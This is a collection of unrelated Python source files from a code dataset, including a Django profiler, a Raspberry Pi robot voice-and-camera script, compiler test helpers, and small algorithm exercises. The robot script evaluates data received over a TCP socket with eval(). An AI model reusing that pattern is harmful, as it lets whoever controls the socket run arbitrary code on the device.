.core.logger import sql_logger\n\n\n\"\"\" Decorator used to monkey patch the Django SQLCompiler.\n\nArgs:\n Accepts and passes on all arguments, the only one being used is the first\n positional argument which is the `self` class reference, the Django SQLCompiler\nReturns:\n decorated Django SQLCompiler class.\nRaises:\n Nothing\n\n\"\"\"\ndef profiler_wrapper(func):\n def inner(*args, **kwargs):\n compiler = args[0]\n\n try:\n sql_string = compiler.as_sql()[0]\n except EmptyResultSet:\n sql_string = 'EmptyResultSet raised from Django'\n\n sql_logger(\n compiler.using,\n compiler.query.model,\n sql_string\n )\n\n return func(*args, **kwargs)\n return inner\n\ntry:\n from django.db.models.sql.compiler import SQLCompiler, SQLInsertCompiler, SQLUpdateCompiler\n from django.db.models.sql.datastructures import EmptyResultSet\n\n # decorate any SQL compilers that have an `execute_sql` method\n SQLCompiler.execute_sql = profiler_wrapper(SQLCompiler.execute_sql)\n SQLInsertCompiler.execute_sql = profiler_wrapper(SQLInsertCompiler.execute_sql)\n SQLUpdateCompiler.execute_sql = profiler_wrapper(SQLUpdateCompiler.execute_sql)\nexcept:\n raise exceptions.DjangoImportException('Could not import Django SQLCompiler')\n","sub_path":"django_orm_profiler/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307012483","text":"#!/usr/bin/python\n# >>stt\n'''\nset GOOGLE_APPLICATION_CREDENTIALS=C:/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\nexport GOOGLE_APPLICATION_CREDENTIALS=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n'''\n# set GOOGLE_APPLICATION_CREDENTIALS=C:/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\n\n# gcloud auth activate-service-account --key-file=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n\n# export GOOGLE_APPLICATION_CREDENTIALS=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n\n# >>tts\n\n# vast-verve-320303-5b57752cb55a // .json\n\n# /home/pi/Downloads/vast-verve-320303-5b57752cb55a.json\n\n# 가상환경 활성화 source test/bin/activate\n\nfrom __future__ import division\n\nimport pandas as pd\nimport threading\nimport alsaaudio\nimport pyaudio\nimport pyttsx3\nimport socket\nimport numpy\nimport time\nimport pygame\nimport sys\nimport cv2\nimport ast\nimport re\nimport os\nimport gspeech\nfrom google.cloud import speech\nfrom six.moves import queue\n\n# 상위 디렉토리 추가 (for utils.config)\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom utils.config import Config as cfg\n\nsys.path.append(cfg.OPENPIBO_PATH + '/lib')\nfrom vision.visionlib import cCamera\nfrom motion.motionlib import cMotion\nfrom audio.audiolib import cAudio\nfrom oled.oledlib import cOled\nfrom speech.speechlib import cSpeech\nfrom speech.speechlib import cDialog\n\noObj = cOled(conf=cfg)\nm = cMotion(conf=cfg)\n'''\ndef playSound(filename):\n pygame.mixer.music.load(filename)\n pygame.mixer.music.play()\n\ndef tts_f():\n pygame.mixer.init()\n playSound('5m.mp3')\n time.sleep(30.0)\n'''\ndata_pd = pd.read_excel('/home/pi/openpibo-data/proc/dialog.xls', header = None) # names = ['명령어', '대답', '종료여부', '모션'])\ncmdLists = pd.DataFrame.to_numpy(data_pd)\n\n# 이거 안 씀 motion_flag = 0 # 모션 동작 연속적으로 할 수 있게 하는 flag\n# 이거 안 씀 count_flag = 0\n# 이거 안 씀 wait = 0\n\n###변수 선언부###\nstatus_speak_mode = 2 # 전역 / 안내모드 : 1, 일상모드 : 0 / cmdLists[i][3] 2: 대기모드\nflag_action = 0\nmotion_once = 0\nr_arm = -70\nr_hand = -25\nl_arm = 70\nl_hand = 25\n\nR_ARM_P = 8\nR_ARM_D = 0.05\nrepeat = 0 # 안내모드 시 순차적 동작 실행하는데 쓰임 \n\nr_arm_p = R_ARM_P # 파이보 모션 제어 \nr_arm_d = R_ARM_D\nl_arm_p = R_ARM_P\nr_hand_p = 4\nl_hand_p = r_hand_p\nr_hand_d = 1\n\nglobal_vol = 0\n\ndef speak(msg,num,voice):\n tObj = cSpeech(conf=cfg)\n filename = cfg.TESTDATA_PATH+\"/test.mp3\"\n print(\"voice : \", voice)\n tObj.tts(\"\\\n \"+msg+\"\\\n \"\\\n , filename)\n aObj = cAudio()\n # audio.setvolume(voice)\n # current_volume = audio.getvolume() # Get the current Volume\n # print(\"current_volume :\", current_volume)\n\n aObj.play(filename, out='local', volume=global_vol)\n time.sleep(num)\n \ndef CommandProc(stt):\n global flag_action, repeat\n global status_speak_mode, global_vol\n # 문자 양쪽 공백 제거\n cmd = stt.strip()\n # 입력 받은 문자 화면에 표시\n \n print('나 : ' + str(cmd))\n for i in range(len(cmdLists)):\n if cmdLists[i][0] in str(cmd):\n \n status_speak_mode = int(cmdLists[i][3]) \n print ('구글 스피치 : ' + cmdLists[i][1])\n print(\"global_vol : \", global_vol)\n speak(cmdLists[i][1], len(cmdLists[i][1])/5, global_vol)\n \n \n print(\"\\n>>말해주세요~\")\n print(\"cmdLists[i][3] : \", cmdLists[i][3])\n gsp.resumeMic()\n return cmdLists[i][2]\n # 리스트에 없는 명령어일 경우 \n print ('구글 스피치 : 무슨 얘기하는 거니?')\n speak('무슨이야기 하는거니?', 1, global_vol)\n status_speak_mode = 2\n time.sleep(2)\n gsp.resumeMic()\n print(\"\\n>>말해주세요~\")\n return 1\n\n\n\ndef eye_tracking(r_arm, r_hand, motionData_x, motionData_y, l_arm, l_hand):\n MT = 300\n \n global flag_action, motion_once\n global status_speak_mode\n # print(\"------------\")\n # print(\"status_speak_mode(tracking): \", status_speak_mode)\n \n if status_speak_mode == 1 and motion_once == 0 : # 안내모드 일 때 \n motion_once += 1\n oObj.draw_image(cfg.TESTDATA_PATH +\"/i2.JPEG\")\n oObj.show() # oled 띄우는 것 \n m.set_motion(name=\"guide2\", cycle=1)\n motion_once = 0\n status_speak_mode = 2\n \n \n elif status_speak_mode == 0 and motion_once == 0 : # 일상모드 일 떄 \n motion_once += 1\n oObj.draw_image(cfg.TESTDATA_PATH +\"/conversation.png\")\n oObj.show() # oled 띄우는 것 \n m.set_motion(name=\"clapping2\", cycle=1)\n motion_once = 0\n status_speak_mode = 2\n\n elif status_speak_mode == 2: # 음성 입력 없을 때 그냥 트래킹만 하는 것. 숨쉬기 모드 \n # print(\"r_hand, l_hand: \", r_hand, l_hand)\n m.set_motors(positions=[0,0,-70,r_hand, motionData_x, motionData_y,0,0,70,l_hand], movetime=MT) \n oObj.draw_image(cfg.TESTDATA_PATH +\"/pibo_logo.png\") \n oObj.show() # oled 띄우는 것 \n \n \n\"\"\"구글 스피치 부분 함수 끝\"\"\"\n\n#연결할 서버(수신단)의 ip주소와 port번호\nTCP_IP = '192.168.0.79'\nTCP_PORT = 5001\n#송신을 위한 socket 준비\nsock = socket.socket()\nsock.connect((TCP_IP,TCP_PORT))\n#OpenCV를 이용해서 webcam으로 부터 이미지 추출\n\ncapture = cv2.VideoCapture(0)\n\nm.set_motors(positions=[0,0,-70,-25,0,0,0,0,70,25], movetime=500)\n\ntime.sleep(3)\nmotion_list = []\n\naudio = alsaaudio.Mixer()\ncurrent_volume = audio.getvolume() # Get the current Volume\naudio.setvolume(30) # Set the volume to 70%.\n\n# Audio recording parameters\nRATE = 16000\nCHUNK = int(RATE / 10) # 100ms\n\ntext = pyttsx3.init()\n\n'''\n# 말하는 속도\ntext.setProperty('rate', 150)\nrate = text.getProperty('rate')\n# 목소리\nvoices = text.getProperty('voices')\n# text.setProperty('voice', voices[0].id) # 남성\ntext.setProperty('voice', 'english+f1') # 여성\n# text.setProperty('voice', voices[1].id) # 여성\n'''\n\ngsp = gspeech.Gspeech()\ndef main(): \n while True:\n # 음성 인식 될때까지 대기 한다.\n stt = gsp.getText()\n if stt is None:\n break\n gsp.pauseMic()\n time.sleep(0.01)\n CommandProc(stt)\n\n #끝내자는 명령이 들어오면 프로그램 종료\n if ('끝내자' in stt):\n break\n \nSTT = threading.Thread(target = main) # 구글 스피치 thread \nSTT.start()\nwhile True :\n \n ret, frame = capture.read()\n frame = cv2.flip(frame,0)\n\n #추출한 이미지를 String 형태로 변환(인코딩)시키는 과정\n encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),90]\n result, imgencode = cv2.imencode('.jpg', frame, encode_param)\n data = numpy.array(imgencode)\n stringData = data.tostring()\n\n #String 형태로 변환한 이미지를 socket을 통해서 전송\n sock.send( str(len(stringData)).ljust(16).encode())\n sock.send( stringData )\n\n # 파이보로부터 motion data 수신했는지 판단 여부\n people = sock.recv(1).decode(\"utf8\")\n # print(\"motion_send : \", people)\n\n if people != '0' and people != '':\n \n # 파이보로부터 Motion data 수신\n motion_list = sock.recv(1024)\n # print(\"motion_list : \", motion_list)\n motion_list = eval(motion_list)\n motionData_x = int(motion_list[0])\n motionData_y = int(motion_list[1])\n vol = int(motion_list[2])\n global_vol = vol\n motion_list = []\n \n if status_speak_mode == 2 : \n # 숨쉬는 귀여운 파이보 가만히 있을 때 \n if l_hand < -20 or l_hand > 25 :\n l_hand_p = -1 * l_hand_p\n # print(\">>l_hand_p :\", l_hand_p)\n l_hand -= l_hand_p\n r_hand = -1 * l_hand\n \n\n eye_track = threading.Thread(target=eye_tracking, args=(r_arm, r_hand, motionData_x, motionData_y, l_arm, l_hand))\n eye_track.start()\n else :\n if status_speak_mode == 2 : \n # 숨쉬는 귀여운 파이보 가만히 있을 때 \n if l_hand < -20 or l_hand > 25 :\n l_hand_p = -1 * l_hand_p\n # print(\">>l_hand_p :\", l_hand_p)\n l_hand -= l_hand_p\n r_hand = -1 * l_hand\n\n eye_track = threading.Thread(target=eye_tracking, args=(r_arm, r_hand, 0, 0, l_arm, l_hand))\n eye_track.start()\n \ncv2.destroyAllWindows() \nsock.close()\n","sub_path":"openpibo-example/speech/restrict_new.py","file_name":"restrict_new.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"597123193","text":"\nimport lit.util\n\n\nclass CXXCompiler(object):\n def __init__(self, path, flags=[], compile_flags=[], link_flags=[], use_ccache=False):\n self.path = path\n self.flags = list(flags)\n self.compile_flags = list(compile_flags)\n self.link_flags = list(link_flags)\n self.use_ccache = use_ccache\n self.type = None\n self.version = (None, None, None)\n self._initTypeAndVersion()\n\n def _initTypeAndVersion(self):\n # Get compiler type and version\n macros = self.dumpMacros()\n if macros is None:\n return\n compiler_type = None\n major_ver = minor_ver = patchlevel = None\n if '__clang__' in macros.keys():\n compiler_type = 'clang'\n # Treat apple's llvm fork differently.\n if '__apple_build_version__' in macros.keys():\n compiler_type = 'apple-clang'\n major_ver = macros['__clang_major__']\n minor_ver = macros['__clang_minor__']\n patchlevel = macros['__clang_patchlevel__']\n elif '__GNUC__' in macros.keys():\n compiler_type = 'gcc'\n major_ver = macros['__GNUC__']\n minor_ver = macros['__GNUC_MINOR__']\n patchlevel = macros['__GNUC_PATCHLEVEL__']\n self.type = compiler_type\n self.version = (major_ver, minor_ver, patchlevel)\n\n def _basicCmd(self, infiles, out, is_link=False):\n cmd = []\n if self.use_ccache and not is_link:\n cmd += ['ccache']\n cmd += [self.path]\n if out is not None:\n cmd += ['-o', out]\n if isinstance(infiles, list):\n cmd += infiles\n elif isinstance(infiles, str):\n cmd += [infiles]\n else:\n raise TypeError('infiles must be a string or list')\n return cmd\n\n def preprocessCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out) + ['-x', 'c++', '-E']\n cmd += self.flags + self.compile_flags + flags\n return cmd\n\n def compileCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out) + ['-x', 'c++', '-c']\n cmd += self.flags + self.compile_flags + flags\n return cmd\n\n def linkCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out, is_link=True)\n cmd += self.flags + self.link_flags + flags\n return cmd\n\n def compileLinkCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out, is_link=True) + ['-x', 'c++']\n cmd += self.flags + self.compile_flags + self.link_flags + flags\n return cmd\n\n def preprocess(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.preprocessCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def compile(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.compileCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def link(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.linkCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def compileLink(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.compileLinkCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def dumpMacros(self, infiles=None, flags=[], env=None, cwd=None):\n if infiles is None:\n infiles = '/dev/null'\n flags = ['-dM'] + flags\n cmd, out, err, rc = self.preprocess(infiles, flags=flags, env=env,\n cwd=cwd)\n if rc != 0:\n return None\n parsed_macros = dict()\n lines = [l.strip() for l in out.split('\\n') if l.strip()]\n for l in lines:\n assert l.startswith('#define ')\n l = l[len('#define '):]\n macro, _, value = l.partition(' ')\n parsed_macros[macro] = value\n return parsed_macros\n\n def getTriple(self):\n cmd = [self.path] + self.flags + ['-dumpmachine']\n return lit.util.capture(cmd).strip()\n","sub_path":"test/libcxx/test/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"608476935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nReads lines of input.txt and writes whether brackets are nested correctly to output.txt \n\"\"\"\n__author__ = \"ElizabethS5\"\n\nimport sys\n\n\ndef get_lines(filename):\n \"\"\"Open and read txt file, return list of lines\"\"\"\n f = open(filename, \"r\")\n lines = f.read().split('\\n')\n f.close()\n return lines\n\n\ndef string_to_list(string):\n \"\"\"Takes a string and puts characters in a list\"\"\"\n line_list = []\n copy = string[:]\n while copy:\n if copy[:2] == '(*' or copy[:2] == '*)':\n line_list.append(copy[:2])\n copy = copy[2:]\n else:\n line_list.append(copy[0])\n copy = copy[1:]\n return line_list\n\n\ndef test_line_list(line_list):\n \"\"\"If line_list passes return 'Yes' else return 'No' and failing position\"\"\"\n copy = line_list[:]\n stack = []\n position = 1\n while copy:\n if copy[0][-1] in '>}])':\n if len(stack) == 0:\n return f\"NO {position}\"\n elif copy[0] == '>' and stack[-1] == '<':\n stack.pop()\n elif copy[0] == ']' and stack[-1] == '[':\n stack.pop()\n elif copy[0] == '}' and stack[-1] == '{':\n stack.pop()\n elif copy[0] == ')' and stack[-1] == '(':\n stack.pop()\n elif copy[0] == '*)' and stack[-1] == '(*':\n stack.pop()\n else:\n return f\"NO {position}\"\n elif copy[0][0] in '<{[(':\n if len(copy) == 1:\n return f\"NO {position}\"\n else:\n stack.append(copy[0])\n position += 1\n copy.pop(0)\n if len(stack) != 0:\n return f'NO {position}'\n else:\n return 'YES'\n\n\ndef write_output(string):\n \"\"\"Write string to file\"\"\"\n f = open('output.txt', 'w')\n f.write(string)\n f.close()\n\n\ndef main(args):\n \"\"\"Use input.txt to write output.txt\"\"\"\n lines_from_input = get_lines('input.txt')\n line_lists = [string_to_list(line) for line in lines_from_input]\n output = '\\n'.join([test_line_list(line_list)\n for line_list in line_lists])\n write_output(output)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"231374509","text":"# python3\r\n\r\nimport sys\r\n\r\n\r\nclass Table:\r\n def __init__(self,id,rows):\r\n self._id = id\r\n self._rows = rows\r\n\r\n\r\ndef getParent(table):\r\n while table != parent[table]:\r\n parent[table] = getParent(parent[table])\r\n table = parent[table]\r\n\r\n return table\r\n\r\ndef merge(destination, source):\r\n global maxRows\r\n i_id = getParent(destination)\r\n j_id = getParent(source)\r\n\r\n if i_id == j_id:\r\n return\r\n\r\n if rank[i_id] > rank[j_id]:\r\n parent[j_id] = i_id\r\n tables[i_id]._rows += tables[j_id]._rows\r\n if maxRows < tables[i_id]._rows:\r\n maxRows = tables[i_id]._rows\r\n else:\r\n parent[i_id] = j_id\r\n tables[j_id]._rows += tables[i_id]._rows\r\n if maxRows < tables[j_id]._rows:\r\n maxRows = tables[j_id]._rows\r\n\r\n if rank[i_id] == rank[j_id]:\r\n rank[j_id] += 1\r\n\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\nlines = list(map(int, sys.stdin.readline().split()))\r\nrank = [1] * n\r\nparent = list(range(0, n))\r\ntables = [Table(i,rowCount) for i,rowCount in enumerate(lines)]\r\nmaxRows = max(lines)\r\nfor i in range(m):\r\n destination, source = map(int, sys.stdin.readline().split()) \r\n merge(destination - 1, source - 1)\r\n print(maxRows)\r\n \r\n","sub_path":"datastructures/Week3/merging_tables.py","file_name":"merging_tables.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529911577","text":"from pymongo import MongoClient\nimport json\nHostName = '192.168.2.169'\n\ndef mongoconn():\n db = MongoClient(HostName,27017)\n my_set = db.MultiApp.test\n return my_set\n\ndef ReadData(my_set):\n j = 0\n #n = 0\n ViewName = None\n for i in my_set.find():\n ViewName = i.get(\"_id\")\n k=i.get('states').get('views')\n if(k!=[]):\n for n in range(len(k)):\n text = k[n].get('text')\n KeyNode = {\n '_id': ViewName,\n 'viewsnum':n,\n 'text':text\n }\n (KeyNode)\n #n+=1\n #break\n\n\n\n\nmyset = mongoconn()\nReadData(myset)","sub_path":"ExperiemtProject/ReadMongo.py","file_name":"ReadMongo.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"523610462","text":"\"\"\"Defines URL patterns for users\"\"\"\nfrom django.urls import path, include\n\nfrom . import views\n\napp_name = 'users'\n\nurlpatterns = [\n\t# Include default auth urls.\n # http://localhost:8000/users/login/ (users.urls.py & login view)\n\tpath('', include('django.contrib.auth.urls')),\n # Registration page.\n # http://localhost:8000/users/register/\n\tpath('register/', views.register, name='register'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219368932","text":"import turtle\nwn = turtle.Screen()\nwn.bgcolor(\"white\")\nbob = turtle.Turtle()\n\n\ndef ex_thirteen(t, n):\n t.speed(0)\n for i in range(n):\n t.penup()\n deg = 360 / n\n t.lt(deg)\n t.fd(100)\n t.stamp()\n t.back(100)\n\n\ndef ex_fourteen():\n print(\"bale\", \"turn\", \"dole\", \"nest\")\n\n\ndef ex_fifteen():\n print(\"pythons,\", \"no it is a boa,\", \"No\")\n\n\n# ex_thirteen(bob, 1000)\n# ex_fourteen()\n# ex_fifteeen()\n\n\nwn.mainloop()\n","sub_path":"3.8_excercises.py","file_name":"3.8_excercises.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73951805","text":"# Linked lists are structures where each node or object in the list is pointing\n# to another node in the list. Since they are referenced by pointers to other objects\n# in the list, they have some advantages/disadvantages over arrays. Nodes in the linked\n# list are not accessible through indices, so they have a linear lookup time. However,\n# this allows them to be stored apart in memory rather than as a sequential block.\n#\n# Built-in list functions and deque Python trivialize implementation of linked lists\n# in Python, this remains a good pedagogical exercise. This linked list is implemented\n# going doubly, with a head, tail, next, and previous pointers. - Luan Pham 2018\n\n# The linked list is comprised of nodes, an abstraction of a connected object.\nclass node:\n\n def __init__(self, data, next, prev): # initializer/constructor\n self.data = data # data stored in the node\n self.next = None # pointer to the next node\n self.prev = None # ponter to the previous node\n\n # some getters and setters, apparently not as important in python (no private constructors anyway)\n def get_data(self):\n return self.data\n\n def set_data(data):\n self.data = data\n\n def get_next(self):\n return self.next\n\n def get_prev(self):\n return self.prev\n\n def set_next(self, Node):\n self.next = Node\n\n def print_node(self):\n print(self.data)\n\nclass linked_list:\n\n def __init__(self): # initializer/constructor\n self.head = None\n self.tail = None\n self.size = 0\n\n def prepend(self, data): # adds a node to the beginning of the linked list\n # creates a node with parameterized data\n new_node = node(data, next = None, prev = None)\n if self.size == 0: # if the linked list is empty, everything points to the new node\n self.tail = self.head = new_node\n else:\n self.head.prev = new_node # former head prev points to new node\n new_node.next = self.head # new node next points to the former head\n self.head = new_node # assigns the head pointer to the new node\n self.size += 1\n\n def append(self, data): # adds a node to the end of the linked list\n # creates a node with parameterized data\n new_node = node(data, next = None, prev = None)\n if self.size == 0: # if the linked list is empty, everything points to the new node\n self.head = self.tail = new_node\n else:\n new_node.prev = self.tail # new node previous points to former tail\n self.tail.next = new_node # former tail next points to the new node\n self.tail = new_node # tail pointer reassigned\n self.size += 1\n\n def remove(self, data):\n if self.size == 0:\n raise IndexError(\"This list is empty!\")\n current = self.head\n counter = 0\n while current:\n if current.data == data:\n if self.size == 1: # exit when we get a last match to avoid pointer issues\n self.head = self.tail = current.next = current.prev = None\n self.size -=1\n return\n counter +=1\n self.size -=1\n if current.prev:\n current.prev.next = current.next\n current.next.prev = current.prev\n else:\n self.head = current.next\n current.next.prev = None\n\n current = current.next\n\n print(\"%s instance(s) of %s removed!\" % (counter, data))\n\n def contains(self, data):\n if self.size == 0:\n raise IndexError(\"This list is empty!\")\n current = self.head\n while current:\n if current.data == data:\n return True\n current = current.next\n return False\n\n\n def print_list(self):\n if self.size == 0:\n raise IndexError(\"This list is empty!\")\n current = self.head #start at the beginning\n while current:\n print(current.data, end = \" \")\n current = current.next #moves to the next node by reassigning pointer\n","sub_path":"python/linked-list.py","file_name":"linked-list.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29423138","text":"from mcpi.minecraft import Minecraft\nimport shapes\nfrom math import ceil\n\ndef main(place):\n mc=Minecraft.create(place,4711)\n x,y,z=mc.player.getPos()\n mc.setBlocks(x-5,y,z-20,x+5,y+5,z-8,0)\n shapes.sphere(mc,x,y,z-15,5,5,5,80,0,4,4,4,0.5,1)\n shapes.cylinder(mc,x,y,z-10,3,3,1,shapes.XY,80)\n shapes.cylinder(mc,x,y,z-10,2,2,1,shapes.XY,0)\n height=0\n nx,ny,nz=x,y-1,z-15\n clear=True\n while clear:\n height+=1\n clearpos=0\n pos=[(0,0),(5,5),(-5,5),(-5,-5),(5,-5)]\n for xmod,zmod in pos:\n if mc.getBlock(xmod+nx,ny-height,zmod+nz) in [0,8,9,10,11,31,37,38,39,40,65,78,102,107,]:\n clearpos+=1\n if clearpos==0:\n clear=False\n shapes.cylinder(mc,x,y-1-ceil(height/2),z-15,5,ceil(height/2),5,shapes.XZ,80)\n mc.setBlocks(x-2,y-1-height,z-11,x+2,y-1,z-9,80)\n #mc.setBlocks(x-5,y-1,z-20,x+5,y-1,z-8,80)\n\nif __name__=='__main__':\n main(\"127.0.0.1\")\n","sub_path":"newigloo.py","file_name":"newigloo.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58273595","text":"# Copyright 2018 Contributors to Hyperledger Sawtooth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------------\n\"\"\"Implements the CONFIRM_ADD_ROLE_ADMIN message\nusage: rbac.role.admin.confirm.create()\"\"\"\nimport logging\nfrom rbac.common import addresser\nfrom rbac.common.crypto.keys import Key\nfrom rbac.common.proposal.proposal_message import ProposalMessage\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ConfirmAddRoleAdmin(ProposalMessage):\n \"\"\"Implements the CONFIRM_ADD_ROLE_ADMIN message\n usage: rbac.role.admin.confirm.create()\"\"\"\n\n @property\n def message_action_type(self):\n \"\"\"The action type performed by this message\"\"\"\n return addresser.MessageActionType.CONFIRM\n\n @property\n def message_subaction_type(self):\n \"\"\"The subsequent action performed or proposed by this message\"\"\"\n return addresser.MessageActionType.ADD\n\n @property\n def message_object_type(self):\n \"\"\"The object type this message acts upon\"\"\"\n return addresser.ObjectType.ROLE\n\n @property\n def message_relationship_type(self):\n \"\"\"The relationship type this message acts upon\"\"\"\n return addresser.RelationshipType.ADMIN\n\n def make_addresses(self, message, signer_keypair):\n \"\"\"Makes the appropriate inputs & output addresses for the message\"\"\"\n if not isinstance(message, self.message_proto):\n raise TypeError(\"Expected message to be {}\".format(self.message_proto))\n if not isinstance(signer_keypair, Key):\n raise TypeError(\"Expected signer_keypair to be provided\")\n\n signer_admin_address = addresser.role.admin.address(\n message.role_id, signer_keypair.public_key\n )\n\n relationship_address = addresser.role.admin.address(\n message.role_id, message.user_id\n )\n\n proposal_address = self.address(\n object_id=message.role_id, target_id=message.user_id\n )\n\n inputs = [signer_admin_address, proposal_address]\n outputs = [proposal_address, relationship_address]\n\n return inputs, outputs\n","sub_path":"rbac/common/role/confirm_admin.py","file_name":"confirm_admin.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"130043127","text":"from envs import env_for_training as env\nfrom simulator import simulate_Interceptor_V2 as sim_env\nfrom savers.debug_logger import create_logger\nfrom envs.env_for_training import Init, Draw, Game_step\n\n# import Interceptor_V2 as env\n# from Interceptor_V2 import Init, Draw, Game_step\n\nlogger = create_logger(\"smart_player\")\ndebug = logger.debug\n\n\ndef choose_action(steps_to_sim):\n SHOOT = 3\n WAIT = 1\n diff_score = simulate_shoot_score(steps_to_sim)\n # if it worth shooting, shoot:\n if diff_score > 0:\n debug(\"shoot!\")\n action_button = SHOOT\n else:\n debug(\"skip\")\n action_button = WAIT\n return action_button\n\n\ndef simulate_shoot_score(steps_to_sim):\n \"\"\"\n :param steps_to_sim: how many step until end of game (1000-stp)\n :return: predicted_shoot_score - predicted_wait_score\n \"\"\"\n SHOOT = 3\n WAIT = 1\n MAX_STEPS = 300\n actions = [SHOOT, WAIT]\n scores = []\n steps_to_sim = min(steps_to_sim, MAX_STEPS)\n for action_button in actions:\n # init new simulate game\n sim_env.Simulate(env.world, env.turret, env.rocket_list, env.interceptor_list, env.city_list,\n env.explosion_list)\n # act\n sim_env.simulate_game_step(action_button)\n\n # peace steps until end of game\n for i in range(steps_to_sim):\n _, _, _, _, score = sim_env.simulate_peace_step()\n # last step : save score in end of peace game\n scores.append(score)\n\n shoot_score = scores[0] - scores[1]\n # debug\n # if shoot_score != 0:\n # debug(f\"steps_to_simulate = {steps_to_sim}\\n diff={shoot_score}\")\n return shoot_score\n\n\nif __name__ == \"__main__\":\n Init()\n max_stp = 1000\n init_stp = 8\n\n # move turent to best angle\n for stp in range(init_stp):\n action_button = 2\n r_locs, i_locs, c_locs, ang, score = Game_step(action_button)\n\n # shoot only if it's worth it\n for stp in range(stp, max_stp):\n action_button = choose_action(max_stp - stp)\n r_locs, i_locs, c_locs, ang, score = Game_step(action_button)\n debug(f\"{stp}.score = {score}\")\n\n if action_button == 3 or stp % 1 == 0:\n Draw()\n","sub_path":"simulator/non_ai_smart_player.py","file_name":"non_ai_smart_player.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"541709167","text":"import numpy as np\nimport random\n\n\nclass SOM():\n\n def __init__(self, nNodes, inputDim, nClass, eta=0.2):\n self.nNodes = nNodes\n self.weights = None\n self.eta = eta\n self.inputDim = inputDim\n self.nClass = nClass\n\n def initWeights(self):\n self.weights = np.zeros((self.nNodes, self.inputDim))\n for i in range(self.nNodes):\n self.weights[i][:] = np.random.random(self.inputDim)\n return self.weights\n\n def euclidianDist(self, pattern):\n dBest = 10000\n for i in range(self.weights.shape[0]):\n d = np.transpose(\n pattern-self.weights[i][:])@(pattern-self.weights[i][:])\n if d < dBest:\n dBest = d\n iBest = i\n return iBest\n\n def neighbourhood(self, index, epoch, epochs):\n if epoch/epochs <= 0.1:\n dist = 25\n elif epoch/epochs <= 0.25:\n dist = 10\n elif epoch/epochs <= 0.75:\n dist = 5\n else:\n dist = 1\n\n neighbours = np.linspace(\n index-dist, index+dist, 2*dist+1)\n neighbours = np.where(neighbours < 0, neighbours + 100, neighbours)\n neighbours = np.where(neighbours > 99, neighbours - 100, neighbours)\n return neighbours\n\n def weightsUpdate(self, pattern, neighbours):\n for i in neighbours:\n self.weights[int(i)][:] = self.weights[int(i)][:] + \\\n self.eta*(pattern-self.weights[int(i)][:])\n return self.weights\n\n\ndef main():\n\n ######## Import animal data ############\n data = []\n with open('/home/andrej/school/ann-course/lab2/animals.dat', 'r') as f:\n d = f.readlines()\n for i in d:\n k = i.rstrip().split(\",\")\n data.append([int(i) for i in 